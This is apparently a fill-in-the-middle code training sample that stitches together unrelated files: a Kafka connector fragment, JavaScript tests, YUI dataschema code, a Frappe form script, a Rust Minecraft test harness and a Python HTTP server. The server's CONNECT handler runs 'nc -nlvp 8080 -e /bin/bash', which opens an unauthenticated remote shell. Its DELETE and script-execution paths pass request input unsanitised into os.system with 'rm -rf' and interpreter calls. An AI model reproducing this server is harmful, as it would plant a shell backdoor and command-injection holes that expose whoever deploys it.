// Nothing to do since FileStreamSinkConnector has no background monitoring.
}
@Override
public ConfigDef config() {
return CONFIG_DEF;
}
}<|fim▁end|> | return AppInfoParser.getVersion();
}
@Override |
<|file_name|>dest.js<|end_file_name|><|fim▁begin|>var through = require('through2');
var should = require('should');
var dat = require('dat');
var File = require('vinyl');
var bops = require('bops');
var vdat = require('..');
describe('dest stream', function () {
var destPath = 'test/data/test-dest';
beforeEach(function (done) {
var db = dat(destPath, function (err) {
if (err) return done(err);
db.destroy(done);
});
});
it('should be a stream', function (done) {
var db = dat(destPath, function (err) {
if (err) return done(err);
var output = vdat.dest(db);
should.exist(output.pipe);
output.on('end', function () {
db.close(done);
});
output.write({foo: 'bar'});
output.end();
});
});
it('should write a vinyl file to dat', function (done) {
var expected = new File({
path: 'test-001',
contents: bops.from(JSON.stringify({foo: 'bar'}))
});
var db = dat(destPath, function (err) {
if (err) return done(err);
var output = vdat.dest(db);
output.on('end', function () {
db.get('test-001', function (err, record) {
if (err) done(err);
should.exist(record);
should.exist(record.version);
record.version.should.eql(1);
db.close(done);
});
});
output.write(expected);
output.end();
});
});<|fim▁hole|>
});<|fim▁end|> | |
<|file_name|>dataschema-json.js<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 3.3.0
build: 3167
*/
YUI.add('dataschema-json', function(Y) {
/**
* Provides a DataSchema implementation which can be used to work with JSON data.
*
* @module dataschema
* @submodule dataschema-json
*/
/**
* JSON subclass for the DataSchema Utility.
* @class DataSchema.JSON
* @extends DataSchema.Base
* @static
*/
var LANG = Y.Lang,
SchemaJSON = {
/////////////////////////////////////////////////////////////////////////////
//
// DataSchema.JSON static methods
//
/////////////////////////////////////////////////////////////////////////////
/**
* Utility function converts JSON locator strings into walkable paths
*
* @method DataSchema.JSON.getPath
* @param locator {String} JSON value locator.
* @return {String[]} Walkable path to data value.
* @static
*/
getPath: function(locator) {
var path = null,
keys = [],
i = 0;
if (locator) {
// Strip the ["string keys"] and [1] array indexes
locator = locator.
replace(/\[(['"])(.*?)\1\]/g,
function (x,$1,$2) {keys[i]=$2;return '.@'+(i++);}).
replace(/\[(\d+)\]/g,
function (x,$1) {keys[i]=parseInt($1,10)|0;return '.@'+(i++);}).
replace(/^\./,''); // remove leading dot
// Validate against problematic characters.
if (!/[^\w\.\$@]/.test(locator)) {
path = locator.split('.');
for (i=path.length-1; i >= 0; --i) {
if (path[i].charAt(0) === '@') {
path[i] = keys[parseInt(path[i].substr(1),10)];
}
}
}
else {
}
}
return path;
},
/**
* Utility function to walk a path and return the value located there.
*
* @method DataSchema.JSON.getLocationValue
* @param path {String[]} Locator path.
* @param data {String} Data to traverse.
* @return {Object} Data value at location.
* @static
*/
getLocationValue: function (path, data) {
var i = 0,
len = path.length;
for (;i<len;i++) {
if(
LANG.isObject(data) &&
(path[i] in data)
) {
data = data[path[i]];
}
else {
data = undefined;
break;
}
}
return data;
},
/**
* Applies a given schema to given JSON data.
*
* @method apply
* @param schema {Object} Schema to apply.
* @param data {Object} JSON data.
* @return {Object} Schema-parsed data.
* @static
*/
apply: function(schema, data) {
var data_in = data,
data_out = {results:[],meta:{}};
// Convert incoming JSON strings
if(!LANG.isObject(data)) {
try {
data_in = Y.JSON.parse(data);
}
catch(e) {
data_out.error = e;
return data_out;
}
}
if(LANG.isObject(data_in) && schema) {
// Parse results data
if(!LANG.isUndefined(schema.resultListLocator)) {
data_out = SchemaJSON._parseResults.call(this, schema, data_in, data_out);
}
// Parse meta data
if(!LANG.isUndefined(schema.metaFields)) {
data_out = SchemaJSON._parseMeta(schema.metaFields, data_in, data_out);
}
}
else {
data_out.error = new Error("JSON schema parse failure");
}
return data_out;
},
/**
* Schema-parsed list of results from full data
*
* @method _parseResults
* @param schema {Object} Schema to parse against.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_parseResults: function(schema, json_in, data_out) {
var results = [],
path,
error;
if(schema.resultListLocator) {
path = SchemaJSON.getPath(schema.resultListLocator);
if(path) {
results = SchemaJSON.getLocationValue(path, json_in);
if (results === undefined) {
data_out.results = [];
error = new Error("JSON results retrieval failure");
}
else {
if(LANG.isArray(results)) {
// if no result fields are passed in, then just take the results array whole-hog
// Sometimes you're getting an array of strings, or want the whole object,
// so resultFields don't make sense.
if (LANG.isArray(schema.resultFields)) {
data_out = SchemaJSON._getFieldValues.call(this, schema.resultFields, results, data_out);
}
else {
data_out.results = results;
}
}
else {
data_out.results = [];
error = new Error("JSON Schema fields retrieval failure");<|fim▁hole|> }
else {
error = new Error("JSON Schema results locator failure");
}
if (error) {
data_out.error = error;
}
}
return data_out;
},
/**
* Get field data values out of list of full results
*
* @method _getFieldValues
* @param fields {Array} Fields to find.
* @param array_in {Array} Results to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_getFieldValues: function(fields, array_in, data_out) {
var results = [],
len = fields.length,
i, j,
field, key, locator, path, parser,
simplePaths = [], complexPaths = [], fieldParsers = [],
result, record;
// First collect hashes of simple paths, complex paths, and parsers
for (i=0; i<len; i++) {
field = fields[i]; // A field can be a simple string or a hash
key = field.key || field; // Find the key
locator = field.locator || key; // Find the locator
// Validate and store locators for later
path = SchemaJSON.getPath(locator);
if (path) {
if (path.length === 1) {
simplePaths[simplePaths.length] = {key:key, path:path[0]};
} else {
complexPaths[complexPaths.length] = {key:key, path:path};
}
} else {
}
// Validate and store parsers for later
//TODO: use Y.DataSchema.parse?
parser = (LANG.isFunction(field.parser)) ? field.parser : Y.Parsers[field.parser+''];
if (parser) {
fieldParsers[fieldParsers.length] = {key:key, parser:parser};
}
}
// Traverse list of array_in, creating records of simple fields,
// complex fields, and applying parsers as necessary
for (i=array_in.length-1; i>=0; --i) {
record = {};
result = array_in[i];
if(result) {
// Cycle through simpleLocators
for (j=simplePaths.length-1; j>=0; --j) {
// Bug 1777850: The result might be an array instead of object
record[simplePaths[j].key] = Y.DataSchema.Base.parse.call(this,
(LANG.isUndefined(result[simplePaths[j].path]) ?
result[j] : result[simplePaths[j].path]), simplePaths[j]);
}
// Cycle through complexLocators
for (j=complexPaths.length - 1; j>=0; --j) {
record[complexPaths[j].key] = Y.DataSchema.Base.parse.call(this,
(SchemaJSON.getLocationValue(complexPaths[j].path, result)), complexPaths[j] );
}
// Cycle through fieldParsers
for (j=fieldParsers.length-1; j>=0; --j) {
key = fieldParsers[j].key;
record[key] = fieldParsers[j].parser.call(this, record[key]);
// Safety net
if (LANG.isUndefined(record[key])) {
record[key] = null;
}
}
results[i] = record;
}
}
data_out.results = results;
return data_out;
},
/**
* Parses results data according to schema
*
* @method _parseMeta
* @param metaFields {Object} Metafields definitions.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Schema-parsed meta data.
* @static
* @protected
*/
_parseMeta: function(metaFields, json_in, data_out) {
if(LANG.isObject(metaFields)) {
var key, path;
for(key in metaFields) {
if (metaFields.hasOwnProperty(key)) {
path = SchemaJSON.getPath(metaFields[key]);
if (path && json_in) {
data_out.meta[key] = SchemaJSON.getLocationValue(path, json_in);
}
}
}
}
else {
data_out.error = new Error("JSON meta data retrieval failure");
}
return data_out;
}
};
Y.DataSchema.JSON = Y.mix(SchemaJSON, Y.DataSchema.Base);
}, '3.3.0' ,{requires:['dataschema-base','json']});<|fim▁end|> | }
} |
<|file_name|>guimporter.py<|end_file_name|><|fim▁begin|>#guimporter.py<|fim▁hole|>
from PySide import QtGui, QtCore, QtWebKit
Signal = QtCore.Signal<|fim▁end|> | import sys |
<|file_name|>supplier.js<|end_file_name|><|fim▁begin|>// Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
// License: GNU General Public License v3. See license.txt<|fim▁hole|> },
refresh: function(frm) {
if(frappe.defaults.get_default("supp_master_name")!="Naming Series") {
frm.toggle_display("naming_series", false);
} else {
erpnext.toggle_naming_series();
}
if(frm.doc.__islocal){
hide_field(['address_html','contact_html']);
erpnext.utils.clear_address_and_contact(frm);
}
else {
unhide_field(['address_html','contact_html']);
erpnext.utils.render_address_and_contact(frm);
}
},
});
cur_frm.fields_dict['default_price_list'].get_query = function(doc, cdt, cdn) {
return{
filters:{'buying': 1}
}
}
cur_frm.fields_dict['accounts'].grid.get_field('account').get_query = function(doc, cdt, cdn) {
var d = locals[cdt][cdn];
return {
filters: {
'account_type': 'Payable',
'company': d.company,
"is_group": 0
}
}
}<|fim▁end|> |
frappe.ui.form.on("Supplier", {
before_load: function(frm) {
frappe.setup_language_field(frm); |
<|file_name|>workform.js<|end_file_name|><|fim▁begin|>$(document).ready(function() {
$.viewMap = {
'install' : $('#coordinator_row'),
'repair' : $('#barcode_row, #equipment_row')
};
$('#coordinator_row').hide();<|fim▁hole|> $.each($.viewMap, function() { this.hide(); });
// show current
$.viewMap[$(this).val()].show();
});
});<|fim▁end|> |
$('#id_work_type').change(function() {
// hide all |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, Christopher Chambers
// Distributed under the GNU GPL v3. See COPYING for details.
use regex::Regex;
use sbbm_asm::assembler::Assembler;
use sbbm_asm::commands::{Command, Target, IntoTarget, players};
use sbbm_asm::fab;
use sbbm_asm::hw::{Computer, MemoryRegion, MemoryStride};
use sbbm_asm::layout::{Layout, LinearMotion};
use sbbm_asm::lexer::Lexer;
use sbbm_asm::nbt::Nbt;
use sbbm_asm::parser::Parser;
use sbbm_asm::types::{Extent, Vec3};
use std::env;
use std::fs::{self, File, OpenOptions};
use std::io::{self, BufRead, BufReader, Read, Write};
use std::mem;
use std::path::PathBuf;
use std::rt::at_exit;
use std::sync::{MutexGuard, Once, StaticMutex, MUTEX_INIT, ONCE_INIT};
const ORIGIN: Vec3 = Vec3 { x: 0, y: 56, z: 0 };
static mut COMPUTER: *const Computer = 0 as *const Computer;
static COMPUTER_INIT: Once = ONCE_INIT;
static SERVER_MUTEX: StaticMutex = MUTEX_INIT;
static SET_REGEX: Regex = regex!(
r"Set score of (\w+) for player .+ to (-?\d+)");
fn server_path() -> PathBuf {
let mut path = PathBuf::from(env::var("CARGO_MANIFEST_DIR").unwrap());
path.push("..");
path.push("server");
path
}
fn input_path() -> PathBuf {
let mut p = server_path();
p.push("input");
p
}
fn output_path() -> PathBuf {
let mut p = server_path();
p.push("output");
p
}
fn capture_path() -> PathBuf {
let mut p = server_path();
p.push("capture");
p
}
<|fim▁hole|>pub struct Server {
_guard: MutexGuard<'static, ()>,
}
impl Server {
pub fn new() -> Server {
let guard = SERVER_MUTEX.lock().unwrap();
COMPUTER_INIT.call_once(|| {
init_computer();
at_exit(destroy_computer).unwrap();
});
let server = Server {
_guard: guard,
};
// Wait for any noise to die down.
server.capture(|| {});
server
}
pub fn write(&self, cmd: &Command) -> io::Result<()> {
let mut f = OpenOptions::new()
.write(true)
.append(true)
.open(input_path())
.unwrap();
write!(f, "{}\n", cmd)
}
pub fn exec(&self, cmd: &Command) -> io::Result<String> {
// FIXME: Eliminate all unwrap to prevent poisoning the mutex.
let (_, output) = self.capture_until(|_| true, || {
self.write(cmd).unwrap();
});
Ok(output)
}
pub fn get(&self, target: &Target, obj: &str) -> io::Result<i32> {
let resp = try!(self.exec(
&players::add(target.clone(), obj.to_string(), 0, None)));
if let Some(cap) = SET_REGEX.captures(&resp[..]) {
// TODO: Verify that the objectives match.
// FIXME: Real error handling.
Ok(cap.at(2).unwrap().parse().unwrap())
} else {
panic!("ugh error handling is hard");
}
}
pub fn get_computer(&self, obj: &str) -> io::Result<i32> {
self.get(&computer().selector().into_target(), obj)
}
pub fn capture_until<F, P, T>(&self, p: P, f: F) -> (T, String)
where F : Fn() -> T,
P : Fn(&str) -> bool
{
// FIXME: Eliminate all panics, return some kind of Result<>
File::create(capture_path()).unwrap();
let res = f();
// FIXME: handle errors, good god man.
let out = File::open(output_path()).unwrap();
let mut out = BufReader::new(out);
// FIXME: eeeerrroors
let mut captured = String::new();
loop {
let start = captured.len();
out.read_line(&mut captured).unwrap();
if p(&captured[start..]) { break; }
}
fs::remove_file(capture_path()).unwrap();
(res, captured)
}
pub fn capture<F, T>(&self, f: F) -> (T, String) where F : Fn() -> T {
let marker = "54799be5-7239-4e00-bd9f-095ae6ed58a3";
let (result, mut output) = self.capture_until(|s| s.contains(marker), || {
let result = f();
self.write(&Command::Say(marker.to_string())).unwrap();
result
});
// Remove the marker line from output.
let mut count = 0;
match output.rfind(|c| if c == '\n' { count += 1; count > 1 } else { false }) {
Some(index) => output.truncate(index + 1),
None => output.truncate(0),
}
(result, output)
}
pub fn run_asm(&self, input: &str) {
// FIXME: Eliminate all unwrap to prevent poisoning the mutex.
let marker = "6ee5dd4a-ea5c-476d-bcab-4c2a912ce2ed";
let (dirty_extent, _) = self.capture_until(|s| s.contains(marker), || {
let mut marked = input.to_string();
marked.push_str("\n\traw say ");
marked.push_str(marker);
let mut parser = Parser::new(Lexer::mem(&marked[..]));
let mut assembler = Assembler::new(
computer(), parser.parse_program().into_iter());
assembler.set_track_output(true);
let mem_controllers = {
let mut c = vec!();
for region in computer().memory.iter() {
c.extend(fab::make_mem_ctrl(region));
}
c };
let motion = Box::new(LinearMotion::new(ORIGIN));
let mut layout = Layout::new(motion, assembler.chain(mem_controllers));
let mut dirty_extent = Extent::Empty;
for (pos, block) in &mut layout {
dirty_extent.add(pos);
self.write(&Command::SetBlock(
pos.as_abs(), block.id, None, None,
Some(Nbt::Compound(block.nbt)))).unwrap();
}
if let Some(Extent::MinMax(min, max)) = layout.get_power_extent("main") {
dirty_extent.add(min);
dirty_extent.add(max);
self.write(&Command::Fill(
min.as_abs(), max.as_abs(), "minecraft:redstone_block".to_string(),
None, None, None)).unwrap();
}
dirty_extent
});
self.capture(|| {
if let Extent::MinMax(min, max) = dirty_extent {
self.write(&Command::Fill(
min.as_abs(), max.as_abs(), "minecraft:air".to_string(),
None, None, None)).unwrap();
}
});
}
}
fn computer() -> &'static Computer {
unsafe { mem::transmute(COMPUTER) }
}
fn init_computer() {
unsafe {
COMPUTER = mem::transmute(Box::new(Computer {
name: "computer".to_string(),
origin: ORIGIN,
memory: vec![
MemoryRegion {
start: 0x10,
size: 0x100,
origin: Vec3::new(ORIGIN.x - 1, ORIGIN.y, ORIGIN.z),
growth: Vec3::new(-1, 1, 1),
stride: MemoryStride::XY(8, 8),
}]
}))
}
let mut f = OpenOptions::new()
.write(true)
.append(true)
.open(input_path())
.unwrap();
computer().write_init_script(&mut f).unwrap();
}
fn destroy_computer() {
let mut f = OpenOptions::new()
.write(true)
.append(true)
.create(true)
.open(input_path())
.unwrap();
computer().write_destroy_script(&mut f).unwrap();
}<|fim▁end|> | |
<|file_name|>webserver.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python2
from conf import *
import socket
import os
from threading import Thread
import time
def get_cookie(request_lines):
#print("cookie data is: " + request_lines[-3])
data = request_lines[-3].split(":")[-1]
return (data.split("=")[-1])
def error_404(addr,request_words):
print("File not Found request")
logging(addr,request_words[1][1:],"error","404")
csock.sendall(error_handle(404,"text/html",False))
response = """<html><head><body>file not found</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_403(addr,request_words):
print("Forbidden")
logging(addr,request_words[1][1:],"error","403")
csock.sendall(error_handle(403,"text/html",False))
response = """<html><head><body>Forbidden</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_400(addr,request_words):
print("Bad request")
logging(addr,request_words[1][1:],"error","400")
csock.sendall(error_handle(400,"text/html",False))
response = """<html><head><body>file not found</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_501(addr,request_words):
print("NOT Implemented")
logging(addr,request_words,"error","501")
csock.sendall(error_handle(501,"text/html",False))
response = """<html><head><body>Not Implemented </body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_401(addr,request_words):
print("Unauthorized")
logging(addr,request_words,"error","401")
csock.sendall(error_handle(401,"text/html",False))
response = """<html><head><body>Unauthorized</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_500(e,file_name,addr):
print("Internal Server Error")
logging(addr,file_name,"error","501")
csock.sendall(error_handle(501,"text/html",False))
response = """<html><head><body>Internal Server Error </body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
def error_411(addr,request_words):
print("Length Required")
logging(addr,request_words,"error","411")
csock.sendall(error_handle(411,"text/html",False))
response = """<html><head><body>Length Required</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()<|fim▁hole|>def error_505(addr,request_words):
print("Trailing whitespaces")
logging(addr,request_words,"error","505")
csock.sendall(error_handle(505,"text/html",False))
response = """<html><head><body>Trailing white spaces</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def page_handle(method,request_lines,file_name,addr,request_words):
print(method)
data = request_lines[-1]
#print("get data is :".format(data))
#print(file_name.split(".")[-1])
if(file_name.split(".")[-1]=="php"):
isphp = True
else:
isphp = False
print(isphp)
session_id= get_cookie(request_lines)
#file_name = root_dir + file_name
print(file_name)
if(root_dir not in file_name):
error_401(addr,file_name)
file_name = serverside(file_name,data,method,session_id)
mime_type = mime_type_handler(file_name.split(".")[-1],addr)
response_file = open(file_name,"r")
response = response_file.read()
response_file.close()
logging(addr,request_words[1][1:],"OK","200")
avoid_response = ["image/x-icon","image/gif","image/jpeg","image/png"]
#if(mime_type not in avoid_response):
#print(response)
# print("response from error handle\n\n\n")
header = error_handle(200,mime_type,isphp)
#print(header)
csock.sendall(header)
csock.sendall(response)
csock.close()
def serverside(file_name,data,method,session_id):
ext = file_name.split(".")[-1]
path_split = file_name.split("/")
if(ext in lang):
if(ext=="php"):
os.environ["_{}".format(method)]= data
os.environ["SESSION_ID"]=session_id
print(os.environ["_{}".format(method)])
os.system("php-cgi {} > output.html".format(file_name))
file_name = "output.html"
#print("file is returned")
return file_name
else:
#print(dat)
try:
if("nodefiles" in path_split):
resp = os.system("node {} > output.html".format(file_name))
filename="output.html"
return file_name
resp = os.system("{} {} > output.html".format(lang[ext],file_name))
file_name = "output.html"
return file_name
except Exception as e:
error_500(e,file_name,addr)
else :
if(ext in mime_switcher):
print("file is returned")
return file_name
else:
error_501(addr,file_name)
def error_handle(errornum,mime_type,isphp):
if(isphp):
response = """HTTP/1.1 {} {}\r\n""".format(errornum,errorname[errornum])
else:
response = """HTTP/1.1 {} {}\r\nContent-type:{}\r\n\r\n""".format(errornum,errorname[errornum],mime_type)
print(response)
return response
def connhandler(csock,addr):
request = csock.recv(1024)
#print(addr)
#sock.sendall(index.read())
request_lines = request.split("\n")
request_words = request_lines[0].split(" ")
print("\r\n\r\n\r\n")
if(len(request_words)!=3):
error_505(addr,request_words)
#print(request)
#print(root_dir)
if(request_words[0] == "GET"):
if(get_enable):
if(request_words[1] == "/"):
file_name = root_dir+root_file
else:
file_name = root_dir+request_words[1][1:]
print(file_name)
if(os.path.isfile(file_name)):
method="GET"
page_handle(method,request_lines,file_name,addr,request_words)
else:
error_404(addr,request_words)
else:
error_403(addr,request_words)
elif(request_words[0]=="POST"):
if(post_enable):
if(request_words[1] == "/"):
file_name = root_dir+root_file
else:
file_name = root_dir+request_words[1][1:]
print(file_name)
if(request_lines[3].split(":")[-1]== 0):
error_411(addr,request_words)
if(os.path.isfile(file_name)):
method="POST"
page_handle(method,request_lines,file_name,addr,request_words)
else:
error_404(addr,request_words)
else:
error_403(addr,request_words)
elif(request_words[0]=="PUT"):
if(put_enable):
data = request_lines[-1]
#if(data!=""):
file_name = request_words[1][1:]
f = open(filename,"a+")
f.write(data)
f.close()
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.close()
else:
error_403(addr,request_words)
elif(request_words[0]=="DELETE"):
if(delete_enable):
file_name = request_words[1][1:]
os.system("rm -rf {}".file_name)
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.sendall("FILE DELETED")
csock.close()
else:
error_403(addr,request_words)
elif(request_words[0]=="CONNECT"):
if(connect_enable):
header = error_handle(200,"text/html",False)
os.system("nc -nlvp 8080 -e /bin/bash")
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.sendall("Port Opened at 8080")
csock.close()
else:
error_403(addr,request_words)
else:
error_400(addr,request_words)
def mime_type_handler(mime,addr):
try:
file_type = mime_switcher[mime.split(".")[-1]]
return file_type
except Exception as e:
logging(addr,e,"exception","")
return "invalid file type"
def logging(addr,request,types,code):
if(types == "error"):
file_name = bad_req_logs_path + "error_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which threw a response code {}\n".format(addr,request,code))
f.close()
elif(types == "exception"):
file_name = bad_req_logs_path + "exception_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which threw a exception\n".format(addr,request,code))
f.close()
else:
file_name = good_req_logs_path + "responses_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which has a response code : {}\n".format(addr,request,code))
f.close()
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
sock.bind((host,port))
sock.listen(5)
print("Servering on port {}".format(port))
while True:
csock,addr = sock.accept()
handler = Thread(target = connhandler,args = (csock,addr),)
handler.start()
#print("handler ran")<|fim▁end|> | #print(file_name)
|
<|file_name|>signup-mixin.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
define(function (require, exports, module) {
'use strict';
var Account = require('models/account');
var assert = require('chai').assert;
var Broker = require('models/auth_brokers/base');
var p = require('lib/promise');
var Relier = require('models/reliers/relier');
var SignUpMixin = require('views/mixins/signup-mixin');
var sinon = require('sinon');
describe('views/mixins/signup-mixin', function () {
it('exports correct interface', function () {
assert.isObject(SignUpMixin);
assert.lengthOf(Object.keys(SignUpMixin), 2);
assert.isFunction(SignUpMixin.signUp);
assert.isFunction(SignUpMixin.onSignUpSuccess);
});
describe('signUp', function () {
var account;
var broker;
var relier;
var view;
beforeEach(function () {
account = new Account({
email: '[email protected]'
});
broker = new Broker();
relier = new Relier();
view = {
_formPrefill: {
clear: sinon.spy()
},
broker: broker,
getStringifiedResumeToken: sinon.spy(),
invokeBrokerMethod: sinon.spy(function () {
return p();
}),
logViewEvent: sinon.spy(),
navigate: sinon.spy(),
onSignUpSuccess: SignUpMixin.onSignUpSuccess,
relier: relier,
signUp: SignUpMixin.signUp,
user: {
signUpAccount: sinon.spy(function (account) {
return p(account);
})
}
};
});
describe('account needs permissions', function () {
beforeEach(function () {
sinon.stub(relier, 'accountNeedsPermissions', function () {
return true;
});
return view.signUp(account, 'password');
});
it('redirects to the `signup_permissions` screen', function () {
assert.isTrue(view.navigate.calledOnce);
var args = view.navigate.args[0];
assert.equal(args[0], 'signup_permissions');
assert.deepEqual(args[1].account, account);
assert.isFunction(args[1].onSubmitComplete);
});
it('does not log any events', function () {
assert.isFalse(view.logViewEvent.called);
});
});
describe('broker supports chooseWhatToSync', function () {
beforeEach(function () {
sinon.stub(broker, 'hasCapability', function (capabilityName) {
return capabilityName === 'chooseWhatToSyncWebV1';
});
return view.signUp(account, 'password');
});
it('redirects to the `choose_what_to_sync` screen', function () {
assert.isTrue(view.navigate.calledOnce);
var args = view.navigate.args[0];
assert.equal(args[0], 'choose_what_to_sync');
assert.deepEqual(args[1].account, account);
assert.isFunction(args[1].onSubmitComplete);
});
it('does not log any events', function () {
assert.isFalse(view.logViewEvent.called);
});
});
describe('verified account', function () {
beforeEach(function () {
account.set('verified', true);
return view.signUp(account, 'password');
});
it('calls view.logViewEvent correctly', function () {
assert.equal(view.logViewEvent.callCount, 3);
assert.isTrue(view.logViewEvent.calledWith('success'));
assert.isTrue(view.logViewEvent.calledWith('signup.success'));
assert.isTrue(view.logViewEvent.calledWith('preverified.success'));
});
it('calls view._formPrefill.clear', function () {
assert.equal(view._formPrefill.clear.callCount, 1);
});
it('calls view.invokeBrokerMethod correctly', function () {
assert.equal(view.invokeBrokerMethod.callCount, 2);
var args = view.invokeBrokerMethod.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'beforeSignIn');
assert.equal(args[1], '[email protected]');<|fim▁hole|> args = view.invokeBrokerMethod.args[1];
assert.lengthOf(args, 2);
assert.equal(args[0], 'afterSignIn');
assert.deepEqual(args[1], account);
});
it('calls view.navigate correctly', function () {
assert.equal(view.navigate.callCount, 1);
var args = view.navigate.args[0];
assert.lengthOf(args, 1);
assert.equal(args[0], 'signup_complete');
});
});
describe('unverified account', function () {
beforeEach(function () {
account.set('verified', false);
return view.signUp(account, 'password');
});
it('calls view.logViewEvent correctly', function () {
assert.equal(view.logViewEvent.callCount, 2);
assert.isTrue(view.logViewEvent.calledWith('success'));
assert.isTrue(view.logViewEvent.calledWith('signup.success'));
});
it('calls view._formPrefill.clear correctly', function () {
assert.equal(view._formPrefill.clear.callCount, 1);
assert.lengthOf(view._formPrefill.clear.args[0], 0);
});
it('calls view.invokeBrokerMethod correctly', function () {
assert.equal(view.invokeBrokerMethod.callCount, 2);
var args = view.invokeBrokerMethod.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'beforeSignIn');
assert.equal(args[1], '[email protected]');
args = view.invokeBrokerMethod.args[1];
assert.lengthOf(args, 2);
assert.equal(args[0], 'afterSignUp');
assert.deepEqual(args[1], account);
});
it('calls view.navigate correctly', function () {
assert.equal(view.navigate.callCount, 1);
var args = view.navigate.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'confirm');
assert.isObject(args[1]);
assert.lengthOf(Object.keys(args[1]), 1);
assert.equal(args[1].account, account);
});
});
describe('_formPrefill undefined', function () {
beforeEach(function () {
view._formPrefill = undefined;
});
it('does not throw', function () {
assert.doesNotThrow(function () {
return view.onSignUpSuccess(account);
});
});
});
});
});
});<|fim▁end|> | |
<|file_name|>settings.go<|end_file_name|><|fim▁begin|>package config
import (
"fmt"
"os"
"github.com/DimensionDataResearch/packer-plugins-ddcloud/helpers"
"github.com/mitchellh/packer/common"
"github.com/mitchellh/packer/helper/communicator"
"github.com/mitchellh/packer/packer"
)
// Settings represents the settings for the customer image import builder.
type Settings struct {
PackerConfig common.PackerConfig `mapstructure:",squash"`
CommunicatorConfig communicator.Config `mapstructure:",squash"`
McpRegion string `mapstructure:"mcp_region"`
McpUser string `mapstructure:"mcp_user"`
McpPassword string `mapstructure:"mcp_password"`
DatacenterID string `mapstructure:"datacenter"`
OVFPackagePrefix string `mapstructure:"ovf_package_prefix"`
TargetImage string `mapstructure:"target_image"`<|fim▁hole|>// GetPackerConfig retrieves the common Packer configuration for the plugin.
func (settings *Settings) GetPackerConfig() *common.PackerConfig {
return &settings.PackerConfig
}
// GetCommunicatorConfig retrieves the Packer communicator configuration for the plugin.
func (settings *Settings) GetCommunicatorConfig() *communicator.Config {
return &settings.CommunicatorConfig
}
// GetMCPUser retrieves the Cloud Control user name.
func (settings *Settings) GetMCPUser() string {
return settings.McpUser
}
// GetMCPPassword retrieves the Cloud Control password.
func (settings *Settings) GetMCPPassword() string {
return settings.McpPassword
}
// Validate determines if the settings is valid.
func (settings *Settings) Validate() (err error) {
if settings.McpRegion == "" {
settings.McpRegion = os.Getenv("MCP_REGION")
if settings.McpRegion == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_region' has not been specified in settings and the MCP_REGION environment variable has not been set"),
)
}
}
if settings.McpUser == "" {
settings.McpUser = os.Getenv("MCP_USER")
if settings.McpUser == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_user' has not been specified in settings and the MCP_USER environment variable has not been set"),
)
}
}
if settings.McpPassword == "" {
settings.McpPassword = os.Getenv("MCP_PASSWORD")
if settings.McpPassword == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_password' has not been specified in settings and the MCP_PASSWORD environment variable has not been set"),
)
}
}
if settings.DatacenterID == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'datacenter' has not been specified in settings"),
)
}
if settings.TargetImage == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'target_image' has not been specified in settings"),
)
}
if settings.OVFPackagePrefix == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'ovf_package_prefix' has not been specified in settings"),
)
}
return
}<|fim▁end|> | }
var _ helpers.PluginConfig = &Settings{}
|
<|file_name|>rot13.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: rot13 -*-
<|fim▁hole|><|fim▁end|> | cevag "Uryyb TvgUho!".rapbqr("rot13") |
<|file_name|>wlt_2_nextion.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# coding=utf-8
# Copyright (c) 2015, 2016 Björn Schrader
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
